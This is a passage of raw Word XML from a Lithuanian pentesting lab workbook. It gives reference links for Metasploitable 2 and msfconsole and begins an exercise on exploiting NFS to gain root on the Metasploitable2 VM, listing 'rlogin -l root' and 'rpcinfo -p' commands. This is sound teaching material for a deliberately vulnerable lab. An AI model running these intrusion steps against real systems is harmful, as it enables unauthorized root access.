    <w:p w14:paraId="5F6F4356" w14:textId="4CBF19F4" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62418853" w14:textId="5C60F98A" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122853D1" w14:textId="79FB8730" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="33724417" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Metasploitable 2. </w:t>
      </w:r>
      <w:r w:rsidR="601ED2EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">A test environment provides a secure place to perform penetration testing and security research. </w:t>
      </w:r>
      <w:r w:rsidR="6CB13B5C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:r w:rsidR="42E6F285" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId112">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.rapid7.com/metasploit/metasploitable-2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FDD706E" w14:textId="640FF008" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="74CC6644" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Metasploitable - Virtual Machine to Test Metasploit. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:r w:rsidR="42E6F285" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId113">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://information.rapid7.com/metasploitable-download.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51010510" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="621F5A29" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="5F7E9061" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> download</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="2C135DA2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable is an intentionally vulnerable Linux virtual machine. </w:t>
      </w:r>
      <w:r w:rsidR="3C02DBBE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SourceForge. </w:t>
      </w:r>
      <w:r w:rsidR="42E6F285" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId114">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59DB0DE1" w14:textId="0884280C" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4408CF00" w14:textId="24BDE2BB" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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14</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMIESI VIRTUALIZAVUI SKIRTA PROGRAMINE ĮRANGA </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PALEISKITE ARBA ĮDIEKITE VIENĄ IŠ ATSPARUMO TESTAVIMUI SKIRTŲ OPERACINIŲ SISTEMŲ. VEIKIANČIOJE OPERACINĖJE SISTEMOJE ĮDIEKITE IR PALEISKITE ĮRANKĮ „MSFCONSOLE“. PATEIKITE VEIKIANČIO ĮRANKIO „MSFCONSOLE“ EKRANO VAIZDĄ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EFBFF7" w14:textId="775E5C90" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC09B84" w14:textId="6483E629" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554EEFCA" w14:textId="6DA93E08" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="11E6DC7F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the MSFconsole Interface. </w:t>
      </w:r>
      <w:r w:rsidR="31F3F652" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Offensive</w:t>
      </w:r>
      <w:r w:rsidR="3651B28D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> security. </w:t>
      </w:r>
      <w:r w:rsidR="3200783A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId115">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/Msfconsole/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="783F09D3" w14:textId="7A2AEAB8" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="20282C28" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>MSFconsole Commands.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="656D2770" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive security. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId116">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41D78727" w14:textId="1A2F58BE" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="50D8D40D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:r w:rsidR="0F6184B8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId117">
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.rapid7.com/metasploit/msf-</w:t>
        </w:r>
        <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:t>overview/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F9AAD3F" w14:textId="6341FA57" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF4C206" w14:textId="5FDBD74F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="42890CD5"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15</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PAŽEIDŽIAMUMŲ IŠNAUDOJIMAS NR.</w:t>
      </w:r>
      <w:r w:rsidR="001C609B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">LINUX TERMINALO </w:t>
      </w:r>
      <w:r w:rsidR="005E7A35" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PA</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AUDOJIMAS IR NFS PASLAUGOS IŠNAUDOJIMAS GAUNANT PRIVILEGIJUOTO VARTOTOJO TEISES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE20D1" w14:textId="5CD8AC76" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testuojama Sistema: Metasploitable2</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>veikianti virtualiame kompiuteryje</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAAE2D3" w14:textId="6FD29091" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistema testavimui: </w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irtualus arba fizinis kompiuteris su testavimui skirta operacine sistema. (rekomenduojama Kali Linux)</w:t>
      </w:r>
      <w:r w:rsidR="33810B62" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B534EA3" w14:textId="0875FC94" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užduotys. Prieš vykd</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ydami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>komandą, kuri nurodyta žemiau, išsiaiškin</w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">komandos paskirtį ir </w:t>
      </w:r>
      <w:r w:rsidR="009A4143" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">išanalizuokite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>naudojimo pavyzdžius. Užduoties atlikimo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0863A3" w14:textId="67BB1B28" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># rlogin -l root [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593B1A7F" w14:textId="554F8396" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># rpcinfo -p [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245ED99" w14:textId="372F5583" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="71FD4F14" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
